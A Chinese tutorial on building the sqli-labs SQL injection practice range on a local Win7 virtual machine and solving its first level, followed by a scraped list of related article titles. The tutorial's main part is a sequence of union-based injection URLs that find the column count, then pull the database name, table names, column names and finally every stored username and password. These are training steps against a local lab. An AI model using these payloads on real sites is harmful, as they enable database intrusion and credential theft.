关于SQL注入靶场搭建及过关教程
关于SQL注入靶场搭建及过关教程
1.需要环境:
下载安装VMware,在虚拟机上布置虚拟机win7或winXP(个人推荐win7,使用界面与现在的win10界面较为相似,使用起来比较舒适)
Win7镜像下载地址:https://msdn.itellyou.cn/
2.需要工具:
PHPstudy,下载地址:https://www.xp.cn/download.html
SQL靶场,下载地址: https://pan.baidu.com/s/1yrIJmkREIuaiB7E1Z3ROpA 提取码: 772u
3.靶场搭建:
在虚拟机上安装好win7镜像后,进入操作界面,在浏览器上下载PHPstudy,选择2016的版本即可。安装时默认路径是英文名,打开它的目录,里面会有一个www的文件夹,然后将下载的SQL靶场文件放入该文件夹里。
启动PHPstudy,打开浏览器,在浏览器网址栏输入http://127.0.0.1/sqli-labs-master(或者在命令行界面查找本机ip,输入http:///sqli-labs-master,也可以)然后回车,进入以下界面就代表靶场搭建成功了!!
4.第一关过关教程:
1)判断整型注入还是字符型注入
http://127.0.0.1/sqli-labs-master/Less-1/?id=1 正常
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ 异常
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ --+ 正常
由此可以判断这一关是字符型注入
2)判断字段数(这一步很关键)
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ order by 3 --+ 正常
http://127.0.0.1/sqli-labs-master/Less-1/?id=1’ order by 4 --+ 异常
由此判断字段数为3
3)爆数据库名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,database(),3 --+
id=-1,表示不让第一个SQL语句输出内容,重点在于后面联合查询的database()函数,该函数用于输出数据库名。
由此查询到数据库名为security
4)爆表名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=‘security’),3 --+
这一条URL与上一句爆库名的相比,用了一句较长的SQL语句代替了database()函数。
了解这条语句之前我们首先要知道,在MySQL5.0版本之后里面有一个默认的数据库叫做information_schema,里面含有三个表,schemata:记录了服务器上所有数据库名;tables:含有两个字段,table_schema记录数据库名,table_name:记录每个数据库含有的表名;columns:含有三个字段,table_schema,table_name,column_name:记录了每个表的字段名。
知道这些上面的SQL语句就很好理解了,就是从名为security的数据库中取出它所含有的表名
由此可查询到表名为,emails,referers,uagents,users这四个表
5)爆字段名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(column_name)from information_schema.columns where table_schema=‘security’ and table_name=‘users’),3 --+
这一句与上面语句差不多,可以按照上面思路去自己理解一下
由此可查询到字段名,id,username,password
6)爆数据
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(id,username,password)from users),3 --+
最终爆出该表的全部用户名和密码
第一关就完成啦!!!
关于SQL注入靶场搭建及过关教程相关推荐
- 搭建mysql注入_常见的sql注入环境搭建
常见的sql注入环境搭建 By : Mirror王宇阳 Time:2020-01-06 PHP+MySQL摘要 $conn = new mysqli('数据库服务器','username','pass ...
- 一次简单的SQL注入靶场练习
一次简单的SQL注入靶场练习 文章目录 一次简单的SQL注入靶场练习 前言 一.靶机下载 二.靶场渗透 1.端口扫描 总结 前言 为了巩固SQL注入以及实战演练的需要,我们来做一次简单的关于SQL注入 ...
- SQL注入靶场 RedTiger通关教程(level1~level10)
Sql注入 介绍 Sql注入指的是通过构建特殊的数据查询语句 作为参数传入Web应用程序,通过数据库执行SQL语句来非法获取数据过程. 其主要原因是开发者/建站商写代码时,对用户提交的数据没有做细致的 ...
- 五分钟制作sql注入靶场
接触安全也快两个月了,学了很多安全的知识,也接触到了渗透测试,前面学习了sql注入和XSS漏洞,听郭老师说可以尝试自己搭建一个靶场,所以开始制作自己靶场! 目录 一.数据库 文件db-creds.in ...
- 开普勒sql注入靶场学习
0x00 靶场搭建 下载地址 https://github.com/admin360bug/PHP 安装方法 导入localhost.sql数据库 修改APP/mysql.class.php 数据库配 ...
- SQL注入靶场:辛巴猫舍
查:有多少行 进去是这样的:直接点击 可以看到:我们的url发生了变化, id是啥,我们猜测,id是数据库的前面的序号,像这样. 我们输入不同的id,可以得到不同的数据库,那么页面也就不同. 测试:i ...
- sqlmap注入教程linux,Linux Sqlmap检测sql注入漏洞工具安装使用教程
Sqlmap工具 什么是SQLmap? SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹.访问底层文件系统.执行命令) sql注 ...
- SQL注入系列(一)——超详细SQL注入环境搭建
首先准备一台:windows2008 sever 的虚拟机(如果电脑配置较低的,可以开自己本机) phpstudy2016(个人喜好) 下载chrome浏览器(用google浏览器,存属于个人爱好哈~ ...
- SQl注入靶场sqli——第一关
在浏览器中 使用?id=1'–+ 是可以闭合的但是直接在数据库中查询就不会被闭合,这里估计是网页代码闭合的原因,在数据库中没有代码直接查询语句. 接下来是在闭合中添加语句执行我们想要的命令 使用 or ...
最新文章
- markdown转html
- 物联网行业网络解决方案_2021物联网趋势:有望从物联网传感器网络中受益的5大行业...
- SAP 采购订单打印完后不可以取消审批
- word2vec应用场景_word2vec有什么应用?
- 从《兄弟连》到团队管理
- 用友u8 12.1服务器硬件要求,用友U8-12.1安装操作手册(服务器)
- 运行IIS提示500.21错误
- MAC安装maven步骤
- 用excel做logistic回归分析_利用SPSS进行Logistic回归分析
- java进制转换方法
- SQL语句写起来太繁琐?你可以试试 MyBatis “动态” SQL
- 自动驾驶(四十五)---------汽车标定-XCP简述
- Navicat Premium11.0.16 for mac 破解
- Kafka 2.8.0 学习
- 教你如何拥有好看的CMD界面 如何美化Windows Terminal
- FFMPEG入门资料---001---介绍和参数说明
- springmvc之静态资源访问不到
- 前端JavaScript基础学习
- android 设置全屏方法,Android中设置全屏的方法
- 7-6 判断题 (15分)
热门文章
- 模型计算算力_8核人工智能开源主板_基于 BITMAIN AI 计算模组_3.5寸
- Sylvia Massy使用Warm Audio电子管话筒录制大乐队
- 2022“高考记忆” 已打包完成,请查收!
- 洛谷P1331 海战 题解
- 河北单招计算机的考试试题,河北单招试题
- Kali Linux渗透测试之被动信息收集(一)——nslookup、dig、DNS区域传输、DNS字典爆破、DNS注册信息
- 剑与远征换服务器影响吗,剑与远征前期有哪些“禁忌”?别在商店买红装,不然后期会后悔!...
- 图片 EXIF 信息中旋转参数 Orientation 的理解
- 程序员如何提高影响力 2.0
- 刘意JavaSE 学习笔记——总纲